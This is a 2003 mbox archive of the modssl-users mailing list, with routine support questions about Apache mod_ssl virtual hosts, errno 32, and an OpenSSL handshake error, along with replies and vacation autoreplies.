	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id LAA07480
	for ; Wed, 25 Jun 2003 11:44:33 -0400
Date: Wed, 25 Jun 2003 11:44:32 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: webtrends, exposed?
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


A tad off topic here, but, is anyone here using webtrends servers exposed
to the internet public?  any concerns with such with such an exposed
placement for this application?

Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 25 23:47:39 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EBC96A8947; Wed, 25 Jun 2003 23:47:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hermod.qsicorp.com (hermod.qsicorp.com [216.190.147.34])
	by master.modssl.org (Postfix) with ESMTP id 85EB1A8936
	for ; Wed, 25 Jun 2003 23:47:37 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by hermod.qsicorp.com (Postfix) with ESMTP id B607F170B0
	for ; Wed, 25 Jun 2003 15:47:32 -0600 (MDT)
Received: from hermod.qsicorp.com ([127.0.0.1]) by localhost (hermod.qsicorp.com [127.0.0.1]) (amavisd-new) with ESMTP id 07004-01 for ; Wed, 25 Jun 2003 15:47:31 -0000 (MDT)
Received: by hermod.qsicorp.com (Postfix, from userid 502)
	id EDF49170A4; Wed, 25 Jun 2003 15:47:30 -0600 (MDT)
Received: from localhost (localhost [127.0.0.1])
	by hermod.qsicorp.com (Postfix) with ESMTP id E60727B35
	for ; Wed, 25 Jun 2003 15:47:30 -0600 (MDT)
Date: Wed, 25 Jun 2003 15:47:30 -0600 (MDT)
From: Daniel Bentley 
To: modssl-users@modssl.org
Subject: Apache 2.0.45, mod_ssl, and virtual hosts
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Virus-Scanned: by amavisd-new amavisd-new-20020630
X-Razor-id: 8f38c7863490fa2c204af65ccb0eb4da128ee8db
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Bentley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Okay, I've been working on this for the past few days, and it's just 
bugging the HECK out of me.  I can get mod_ssl to work, I can get virtual 
hosts to work, but for the LIFE of me, I can't get them to work AT THE 
SAME TIME.

httpd2 --help gives:
[warn] VirtualHost {IP}:0 overlaps with VirtualHost {IP}:0, the first has 
precedence, perhaps you need a NameVirtualHost directive



[warn] VirtualHost {IP}:80 overlaps with VirtualHost {IP}:0, the first has 
precedence, perhaps you need a NameVirtualHost directive


41_mod_ssl.default-vhost.conf:

DocumentRoot /var/www/html



ServerName VirtServ1.domain.tld
DocumentRoot /var/www/html/vs1





DocumentRoot /var/www/sslstuff


In this example, SSL works, but virtual hosts do not (I should mention 
that Vhosts.conf is just plain blank (everything commented out)).

Now, I make it:
NameVirtualHost {IP}


DocumentRoot /var/www/html



ServerName VS1.domain.tld
DocumentRoot /var/www/html/vs1



DocumentRoot /var/www/sslstuff


Lo and behold, virtual hosts work, but SSL does not.  'httpd2 --help' 
replies with:
[error] VirtualHost {IP}:80 -- mixing * ports and non-* ports with a 
NameVirtualHost address is not supported, proceeding with undefined 
results

var/log/httpd/error_log reads:
[error] [client {IP}] Invalid method in request  F^A^C

Replacing  with  results 
in the same.

I don't see where the '[error] VirtualHost {IP}:80 -- mixing * ports and 
non-* ports' comes from, as I'm not defining anything with :80 (unless 
it's automatically 'assumed' somewhere since I'm defining :443)

Basically, it's requiring a  and NO NameVirtualHost 
{IP} in order to get SSL working.  And yes, I've tried  entry,  sslconfig 
, followed then by NameVirtualHost {IP}  
for all the rest of the virtual hosts.  SSL doesn't work then either (and 
virtual hosts do), though httpd2 --help now reports:

(98)Address already in use: make_sock: could not bind to address 
0.0.0.0:80
no listening sockets available, shutting down
Unable to open logs

So, any thoughts/ideas?

-- 
Daniel Bentley - Network Technician, QSI Corporation (www.qsicorp.com)
chown -R us *base*

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 30 16:08:24 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A63B4A8959; Mon, 30 Jun 2003 16:08:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nyslrs.osc.state.ny.us (smtp-lrs.osc.state.ny.us [204.80.56.9])
	by master.modssl.org (Postfix) with ESMTP id 466FEA8933
	for ; Mon, 30 Jun 2003 16:08:23 +0200 (CEST)
Subject: errno:32
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.9a  January 7, 2002
Message-ID: 
From: msagar@osc.state.ny.us
Date: Mon, 30 Jun 2003 10:06:47 -0400
X-MIMETrack: Serialize by Router on SMTP/IRM/NYSLRS(Release 5.0.12  |February 13, 2003) at
 06/30/2003 10:08:20 AM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: msagar@osc.state.ny.us
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

Can anyone please tell me what could cause?

[Mon Jun 30 08:09:59 2003] [error] System: Broken pipe (errno: 32)

Also,

Is there a document that explains the different errno #'s ?

Thanks in advance,

Mark.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 30 16:10:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C5F5CA8973; Mon, 30 Jun 2003 16:10:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.6.11])
	by master.modssl.org (Postfix) with ESMTP id C56D6A8966
	for ; Mon, 30 Jun 2003 16:10:44 +0200 (CEST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #30533)
 id <01KXPKJLOF8G0043FC@mdx.ac.uk> for modssl-users@modssl.org; Mon,
 30 Jun 2003 15:10:30 +0100 (BST)
Received: from mdx-cpq-temp1.nw.mdx.ac.uk (dyn052-012.mdx.ac.uk [158.94.52.12])
 by mdx.ac.uk (PMDF V6.1-1 #30533) with ESMTP id <01KXPKJKQZK000480L@mdx.ac.uk>
 for modssl-users@modssl.org; Mon, 30 Jun 2003 15:10:28 +0100 (BST)
Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk
 (Mercury 1.48); Mon, 30 Jun 2003 15:08:37 +0000
Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Mon,
 30 Jun 2003 15:08:25 +0000
Date: Mon, 30 Jun 2003 15:07:47 +0000
From: a.moon@mdx.ac.uk
Subject: errno:32
To: modssl-users@modssl.org
Message-id: <4B0E5522D@mdx-cpq-temp1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away on annual leave until the 15th July 2003

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 30 21:56:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AAF8EA8959; Mon, 30 Jun 2003 21:56:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtpdmz.bsg.com.ar (Gw2.bsg.com.ar [200.51.95.241])
	by master.modssl.org (Postfix) with ESMTP id 56288A8933
	for ; Mon, 30 Jun 2003 21:56:40 +0200 (CEST)
Received: from smtpproxy.zone.com.ar (smtpproxy [10.1.5.2]) by smtpdmz.bsg.com.ar with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id LYR4LTQR; Mon, 30 Jun 2003 16:57:16 -0300
Received: from imcser.bssg.com (172.16.2.36 [172.16.2.36]) by smtpproxy.zone.com.ar with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id MTM2LZ28; Mon, 30 Jun 2003 16:57:14 -0300
Received: From IMCSER.BSSG.COM (172.16.2.36[172.16.2.36 port:3573]) by imcser.bssg.com
	Mail essentials (server 2.422) with SMTP id: <12211@imcser.bssg.com>
	 for ; Mon, 30 Jun 2003 2:17:14 PM +0000
	smtpmailfrom  
Received: by imcser.bssg.com.ar with Internet Mail Service (5.5.2653.19)
	id ; Mon, 30 Jun 2003 14:17:14 -0300
Message-ID: <8BE8ADB0C371D3118CFB00508B0725560B29B911@mailser.bssg.com.ar>
From: CORRIERI Ricardo 
To: "'modssl-users@modssl.org'" 
Subject: RE: errno:32
Date: Mon, 30 Jun 2003 14:17:11 -0300
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C33F2B.71A77790"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: CORRIERI Ricardo 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C33F2B.71A77790
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Yes, of course, Mark.
If you are working on a UNIX platform, and if you have installed the =
UNIX
manuals, you just have to type=20

   man -s2 Intro

and the man subsystem will display you ALL the UNIX error-codes.

Have fun, you have about (on Solaris, I say) 150 error-codes to look =
for.

Focusing on this error, here is the section of then manual with the =
answer:

-------------------------------------------------------------------
   32 EPIPE  Broken pipe

               A write on a pipe for which there is no process to
               read the data. This condition normally generates a
               signal; the error is returned  if  the  signal  is
               ignored.
------------------------------------------------------------------


Good luck...!!!

-----Original Message-----
From: msagar@osc.state.ny.us [mailto:msagar@osc.state.ny.us]
Sent: Monday, June 30, 2003 11:07 AM
To: modssl-users@modssl.org
Subject: errno:32


Hello,

Can anyone please tell me what could cause?

[Mon Jun 30 08:09:59 2003] [error] System: Broken pipe (errno: 32)

Also,

Is there a document that explains the different errno #'s ?

Thanks in advance,

Mark.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


http://www.portalsociete.com=20
Vis=EDtenos, lo estamos esperando.=20

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
La informaci=F3n aqu=ED contenida es confidencial y est=E1 dirigida
solamente a las personas direccionadas en el mail.
No debe ser considerada como recomendaci=F3n de compra o venta
de valores. Todo acceso no autorizado, uso, reproducci=F3n, o
divulgaci=F3n est=E1 prohibido.
Ni SOCIETE GENERALE ni ninguna de sus subsidiarias o filiales
asumir=E1n responsabilidad ni obligaci=F3n legal alguna por cualquier
informaci=F3n incorrecta o alterada contenida en este mensaje.

The information contained herein is confidential and is intended
solely for the addressee(s).  It shall not be construed as a
recommendation to buy or sell any security.  Any unauthorized
access, use, reproduction, disclosure or dissemination is prohibited.
Neither SOCIETE GENERALE nor any of its subsidiaries or affiliates
shall assume any legal liability or responsibility for any incorrect,
misleading or altered information contained herein.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D



------_=_NextPart_001_01C33F2B.71A77790
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






RE: errno:32




Yes, of course, Mark.

If you are working on a UNIX platform, and if you =
have installed the UNIX manuals, you just have to type 




   man -s2 Intro




and the man subsystem will display you ALL the UNIX =
error-codes.




Have fun, you have about (on Solaris, I say) 150 =
error-codes to look for.




Focusing on this error, here is the section of then =
manual with the answer:




---------------------------------------------------------------=
----

   32 EPIPE  Broken pipe




          &nb=
sp;    A write on a pipe for which there is no process =
to

          &nb=
sp;    read the data. This condition normally generates =
a

          &nb=
sp;    signal; the error is returned  if  =
the  signal  is

          &nb=
sp;    ignored.

---------------------------------------------------------------=
---






Good luck...!!!




-----Original Message-----

From: msagar@osc.state.ny.us [mailto:msagar@osc.state.ny.us=
]

Sent: Monday, June 30, 2003 11:07 AM

To: modssl-users@modssl.org

Subject: errno:32






Hello,




Can anyone please tell me what could cause?




[Mon Jun 30 08:09:59 2003] [error] System: Broken =
pipe (errno: 32)




Also,




Is there a document that explains the different errno =
#'s ?




Thanks in advance,




Mark.






_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org






http://www.portalsociete.com 

Vis=EDtenos, lo estamos esperando. 




=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

La informaci=F3n aqu=ED contenida es confidencial y =
est=E1 dirigida

solamente a las personas direccionadas en el =
mail.

No debe ser considerada como recomendaci=F3n de =
compra o venta

de valores. Todo acceso no autorizado, uso, =
reproducci=F3n, o

divulgaci=F3n est=E1 prohibido.

Ni SOCIETE GENERALE ni ninguna de sus subsidiarias o =
filiales

asumir=E1n responsabilidad ni obligaci=F3n legal =
alguna por cualquier

informaci=F3n incorrecta o alterada contenida en =
este mensaje.




The information contained herein is confidential and =
is intended

solely for the addressee(s).  It shall not be =
construed as a

recommendation to buy or sell any security.  =
Any unauthorized

access, use, reproduction, disclosure or =
dissemination is prohibited.

Neither SOCIETE GENERALE nor any of its subsidiaries =
or affiliates

shall assume any legal liability or responsibility =
for any incorrect,

misleading or altered information contained =
herein.

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D







------_=_NextPart_001_01C33F2B.71A77790--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  2 20:15:52 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 10959A8945; Wed,  2 Jul 2003 20:15:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from osci.qc.ca (zeus.osci.qc.ca [216.113.25.159])
	by master.modssl.org (Postfix) with ESMTP id 76A71A8933
	for ; Wed,  2 Jul 2003 20:15:50 +0200 (CEST)
Received: from [192.168.3.70] (account probert HELO [192.168.3.70])
  by osci.qc.ca (CommuniGate Pro SMTP 4.0.3)
  with ESMTP id 1472939 for modssl-users@modssl.org; Wed, 02 Jul 2003 14:15:45 -0400
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Wed, 02 Jul 2003 14:15:43 -0400
Subject: reason(267) error
From: Pascal Robert 
To: 
Message-ID: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Pascal Robert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi list,

It can be a newbie thing, but I installed a Thawte 'supercert' on our Mac OS
X Server.

- Mac OS X Server 10.2.3
- Apache/1.3.27 (Darwin)
- OpenSSL/0.9.6b

So far, my setup is working with all browsers that we tried, but a
consultant try to connect to our secure host with a .NET (Framework
1.037xxx) and get this error:

----------------
[info]  Connection to child 12 established (server secure.acaiq.com:443,
client xxx.xxx.xxx.xxx)

[info]  Seeding PRNG with 0 bytes of entropy

[error] SSL handshake failed (server secure.acaiq.com:443, client
206.162.166.131) (OpenSSL library error follows)

[error] OpenSSL: error:1408A10B:lib(20):func(138):reason(267)
----------------

My CypherSuite is:

SSLCipherSuite 
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+SSLv3:+EXP

I didn't find what's 'reason(267)' so this list is my only hope ;-)

Thanks.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  2 20:55:48 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3701AA8945; Wed,  2 Jul 2003 20:55:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.6.11])
	by master.modssl.org (Postfix) with ESMTP id 6690AA8933
	for ; Wed,  2 Jul 2003 20:55:47 +0200 (CEST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.2 #30533)
 id <01KXSN2RGY28004TGI@mdx.ac.uk> for modssl-users@modssl.org; Wed,
 02 Jul 2003 19:55:36 +0100 (BST)
Received: from mdx-cpq-temp1.nw.mdx.ac.uk (dyn052-012.mdx.ac.uk [158.94.52.12])
 by mdx.ac.uk (PMDF V6.2 #30533) with ESMTP id <01KXSN2EU4UA004QQH@mdx.ac.uk>
 for modssl-users@modssl.org; Wed, 02 Jul 2003 19:55:33 +0100 (BST)
Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk
 (Mercury 1.48); Wed, 02 Jul 2003 19:53:37 +0000
Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Wed,
 02 Jul 2003 19:52:40 +0000
Date: Wed, 02 Jul 2003 19:18:40 +0000
From: a.moon@mdx.ac.uk
Subject: reason(267) error
To: modssl-users@modssl.org
Message-id: <3970592C83@mdx-cpq-temp1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away on annual leave until the 15th July 2003

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  7 22:34:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DB6D1A8943; Mon,  7 Jul 2003 22:34:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailbox.rabbit-run.net (mailbox.rabbit-run.net [216.174.13.244])
	by master.modssl.org (Postfix) with ESMTP id 9ECC5A8934
	for ; Mon,  7 Jul 2003 22:34:30 +0200 (CEST)
Received: from USUL.purefm.net ([])
        by mailbox.rabbit-run.net (Ultimate Mail Server v1.0) with SMTP id GMB73904
        for ; Mon, 07 Jul 2003 16:34:24 -0400
Message-Id: <5.2.1.1.0.20030707163036.00b0a8f8@mail.zoominternet.net>
X-Sender: fischerdk@mailbox.purefm.net
X-Mailer: QUALCOMM Windows Eudora Version 5.2.1
Date: Mon, 07 Jul 2003 16:34:21 -0400
To: modssl-users@modssl.org
From: "Douglas K. Fischer" 
Subject: CVS repository / Maintainers?
Mime-Version: 1.0
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Douglas K. Fischer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Who is currently maintaining mod_ssl for Apache 1.3.x? I've been tracking 
down a bug and wanted to check the latest mod_ssl repository code against 
2.8.14 (current release) to see if anything has changed that might address 
this bug. All the old links I've found that dealt with the repository and 
bug database at modssl.org are dead...

Many thanks,

Doug
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use 

iQA/AwUBPwnZTZ938qfSpraDEQLi8gCg64z0ifDQ8w+99Ii7yoCfvUidf5YAoK4a
aCKvtN0S20v/YjkwcJLK5WXs
=Cpk7
-----END PGP SIGNATURE-----


------------------------------------------------------------

This email, and any included attachments, have been checked
by Norton AntiVirus Corporate Edition (Version 8.0), AVG
Server Edition 6.0, and Merak Email Server Integrated
Antivirus (Alwil Software's aVast! engine) and is certified
Virus Free.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  7 22:36:17 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 11792A8982; Mon,  7 Jul 2003 22:36:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.6.11])
	by master.modssl.org (Postfix) with ESMTP id 333CBA8980
	for ; Mon,  7 Jul 2003 22:36:16 +0200 (CEST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.2 #30533)
 id <01KXZQ24XRNK006AGI@mdx.ac.uk> for modssl-users@modssl.org; Mon,
 07 Jul 2003 21:36:08 +0100 (BST)
Received: from mdx-cpq-temp1.nw.mdx.ac.uk (dyn052-012.mdx.ac.uk [158.94.52.12])
 by mdx.ac.uk (PMDF V6.2 #30533) with ESMTP id <01KXZQ24DQ7G005Z1A@mdx.ac.uk>
 for modssl-users@modssl.org; Mon, 07 Jul 2003 21:36:07 +0100 (BST)
Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk
 (Mercury 1.48); Mon, 07 Jul 2003 21:34:02 +0000
Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Mon,
 07 Jul 2003 21:34:00 +0000
Date: Mon, 07 Jul 2003 21:33:26 +0000
From: a.moon@mdx.ac.uk
Subject: CVS repository / Maintainers?
To: modssl-users@modssl.org
Message-id: 
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away on annual leave until the 15th July 2003

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  7 23:01:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 92E9DA8943; Mon,  7 Jul 2003 23:01:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 458EFA8934
	for ; Mon,  7 Jul 2003 23:00:57 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA03922;
	Mon, 7 Jul 2003 16:59:28 -0400
Date: Mon, 7 Jul 2003 16:59:27 -0400 (EDT)
From: "R. DuFresne" 
To: "Douglas K. Fischer" 
Cc: modssl-users@modssl.org
Subject: Re: CVS repository / Maintainers?
In-Reply-To: <5.2.1.1.0.20030707163036.00b0a8f8@mail.zoominternet.net>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


  rse@engelschall.com  as always.

Thanks,

Ron DuFresne

On Mon, 7 Jul 2003, Douglas K. Fischer wrote:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Who is currently maintaining mod_ssl for Apache 1.3.x? I've been tracking 
> down a bug and wanted to check the latest mod_ssl repository code against 
> 2.8.14 (current release) to see if anything has changed that might address 
> this bug. All the old links I've found that dealt with the repository and 
> bug database at modssl.org are dead...
> 
> Many thanks,
> 
> Doug
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 7.0.3 for non-commercial use 
> 
> iQA/AwUBPwnZTZ938qfSpraDEQLi8gCg64z0ifDQ8w+99Ii7yoCfvUidf5YAoK4a
> aCKvtN0S20v/YjkwcJLK5WXs
> =Cpk7
> -----END PGP SIGNATURE-----
> 
> 
> ------------------------------------------------------------
> 
> This email, and any included attachments, have been checked
> by Norton AntiVirus Corporate Edition (Version 8.0), AVG
> Server Edition 6.0, and Merak Email Server Integrated
> Antivirus (Alwil Software's aVast! engine) and is certified
> Virus Free.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 11 18:18:24 2003
Return-Path: 
X-Original-To: modssl-users-L
